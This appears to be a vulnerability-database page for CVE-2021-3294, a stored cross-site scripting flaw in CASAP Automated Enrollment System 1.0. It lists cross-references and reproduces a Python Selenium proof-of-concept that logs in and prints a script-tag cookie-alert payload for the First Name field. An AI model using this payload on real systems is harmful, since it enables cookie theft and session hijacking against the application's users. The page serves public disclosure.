CASAP Automated Enrollment System 1.0 Cross Site Scripting

🗓️ 16 Feb 2021 00:00:00Reported by nu11secur1tyType

packetstorm🔗 packetstormsecurity.com👁 320 Views

CASAP Automated Enrollment System 1.0 XSS in 'First Name' Fiel

Reporter	Title	Published	Views	Family All 10
Circl	CVE-2021-3294	9 Feb 202102:39	–	circl
CNNVD	CASAP Automated Enrollment 跨站脚本漏洞	8 Feb 202100:00	–	cnnvd
CNVD	CASAP Automated Enrollment Cross-Site Scripting Vulnerability	23 Feb 202100:00	–	cnvd
CVE	CVE-2021-3294	8 Feb 202123:54	–	cve
Cvelist	CVE-2021-3294	8 Feb 202123:54	–	cvelist
Exploit DB	CASAP Automated Enrollment System 1.0 - 'First Name' Stored XSS	25 Jan 202100:00	–	exploitdb
EUVD	EUVD-2021-26628	7 Oct 202500:30	–	euvd
NVD	CVE-2021-3294	9 Feb 202100:15	–	nvd
Prion	Cross site scripting	9 Feb 202100:15	–	prion
RedhatCVE	CVE-2021-3294	22 May 202518:35	–	redhatcve

`# Exploit Title: CASAP Automated Enrollment System 1.0 - 'First Name' Stored XSS  
# Author: nu11secur1ty  
# Date: 02.15.2021  
# Vendor: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html  
# Software Athor: https://www.sourcecodester.com/users/yna-ecole  
# Link: https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-3294/CASAP.zip  
# Link Original: https://www.sourcecodester.com/download-code?nid=12210&title=CASAP+Automated+Enrollment+System+using+PHP%2FMySQLi+with+Source+Code  
# CVE: CVE-2021-3294  
  
  
[+] Credits: (@ nu11secur1ty)  
[+] Website: https://www.nu11secur1ty.com/  
[+] Source:  
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3294  
  
[Exploit Program Code]  
#!/usr/bin/python3  
# author @nu11secur1ty  
# For CVE-2021-3294  
  
from selenium import webdriver  
from selenium.webdriver.common.by import By  
from selenium.webdriver.support.ui import WebDriverWait  
from selenium.webdriver.support import expected_conditions as EC  
import time  
import os  
  
  
#enter the link to the website you want to automate login.  
website_link="http://localhost/Final/index.php"  
  
#enter your login username  
username="yna.ecole"  
  
#enter your login password  
password="12345"  
  
  
#enter the element for username input field  
element_for_username="username"  
#enter the element for password input field  
element_for_password="password"  
#enter the element for submit button  
element_for_submit="login"  
  
  
#browser = webdriver.Safari() #for macOS users[for others use chrome vis  
chromedriver]  
browser = webdriver.Chrome() #uncomment this line,for chrome users  
#browser = webdriver.Firefox() #uncomment this line,for chrome users  
  
browser.get((website_link))  
  
try:  
username_element = browser.find_element_by_name(element_for_username)  
username_element.send_keys(username)  
password_element = browser.find_element_by_name(element_for_password)  
password_element.send_keys(password)  
signInButton = browser.find_element_by_name(element_for_submit)  
signInButton.click()  
  
exploit="nu11<script>alert(document.cookie)</script>"  
print("If everything is ok, please paste this in to the Users in section in  
First Name\n")  
print(exploit)  
  
except Exception:  
#### This exception occurs if the element are not found in the webpage.  
print("Some error occured :(")  
  
[Vendor]  
https://www.sourcecodester.com/users/yna-ecole  
  
  
[Vulnerability Type]  
XSS  
  
[CVE Reference]  
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3294  
  
[Security Issue]  
CASAP Automated Enrollment System 1.0 is affected by cross-site scripting  
(XSS) in users.php.  
An attacker can steal a cookie to perform user redirection to a malicious  
website.  
  
  
[Video]  
https://www.youtube.com/watch?v=_nhIZyJ8rxM  
  
  
@nu11secur1ty  
https://www.nu11secur1ty.com/  
`

16 Feb 2021 00:00Current

0.1Low risk

Vulners AI Score0.1

EPSS0.0057